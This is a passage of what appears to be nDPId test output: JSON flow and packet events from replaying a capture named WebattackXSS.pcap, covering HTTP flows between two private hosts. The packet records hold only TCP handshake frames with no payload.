+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347324538,"flow_last_seen":1499347324538,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347324538,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1499347324538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347324538,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uCpAAD4GDaasEAABwKgKMtquAFARp\/xAAAAAAKACchAweQAAAgQFtAQCCAoBOkRqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1499347324538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347324538,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2q5SOt2REaf8QaAScSDnxwAAAgQFtAQCCAoD5BXgATpEagEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2970,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1499347324539,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347324539,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uCtAAD4GDa2sEAABwKgKMtquAFARp\/xBUjrdkoAQAOWGzwAAAQEICgE6RGoD5BXg"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347325777,"flow_last_seen":1499347325777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347325777,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1499347325777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347325777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C\/ZAAD4GudqsEAABwKgKMtq8AFA4wE5pAAAAAKACchC19AAAAgQFtAQCCAoBOkWfAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2981,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1499347325777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347325777,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2rxxlybyOMBOaqAScSADUQAAAgQFtAQCCAoD5BcVATpFnwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2983,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1499347325777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347325777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C\/dAAD4GueGsEAABwKgKMtq8AFA4wE5qcZcm84AQAOWiVwAAAQEICgE6RaAD5BcV"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347328298,"flow_last_seen":1499347328298,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347328298,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1499347328298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347328298,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K4RAAD4GmkysEAABwKgKMtrWAFBZCmOSAAAAAKACchB98AAAAgQFtAQCCAoBOkgWAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1499347328299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347328299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2tYFgFaJWQpjk6AScSAFVgAAAgQFtAQCCAoD5BmMATpIFgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3000,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":3,"flow_last_seen":1499347328299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347328299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K4VAAD4GmlOsEAABwKgKMtrWAFBZCmOTBYBWioAQAOWkXQAAAQEICgE6SBYD5BmM"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3010,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347329594,"flow_last_seen":1499347329594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347329594,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3010,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1499347329594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347329594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8olxAAD4GI3SsEAABwKgKMtrkAFD4u+sGAAAAAKACchBVeAAAAgQFtAQCCAoBOklaAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":2,"flow_last_seen":1499347329594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347329594,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2uSvjPx7+LvrB6AScSCLmgAAAgQFtAQCCAoD5BrQATpJWgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3012,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":3,"flow_last_seen":1499347329595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347329595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ol1AAD4GI3usEAABwKgKMtrkAFD4u+sHr4z8fIAQAOUqogAAAQEICgE6SVoD5BrQ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347332137,"flow_last_seen":1499347332137,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347332137,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1499347332137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347332137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hpdAAD4GPzmsEAABwKgKMtr+AFAKS81CAAAAAKACchBfGAAAAgQFtAQCCAoBOkvVAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1499347332137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347332137,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2v58hG58CkvNQ6AScSBTxwAAAgQFtAQCCAoD5B1LATpL1QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1499347332138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347332138,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hphAAD4GP0CsEAABwKgKMtr+AFAKS81DfIRufYAQAOXyzQAAAQEICgE6S9YD5B1L"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347333419,"flow_last_seen":1499347333419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1499347333419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347333419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bENAAD4GWY2sEAABwKgKMtsMAFCNWiFVAAAAAKACchCGpwAAAgQFtAQCCAoBOk0WAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":2,"flow_last_seen":1499347333420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347333420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2wzHhupcjVohVqAScSCzMgAAAgQFtAQCCAoD5B6MATpNFgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":3,"flow_last_seen":1499347333420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347333420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bERAAD4GWZSsEAABwKgKMtsMAFCNWiFWx4bqXYAQAOVSOgAAAQEICgE6TRYD5B6M"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 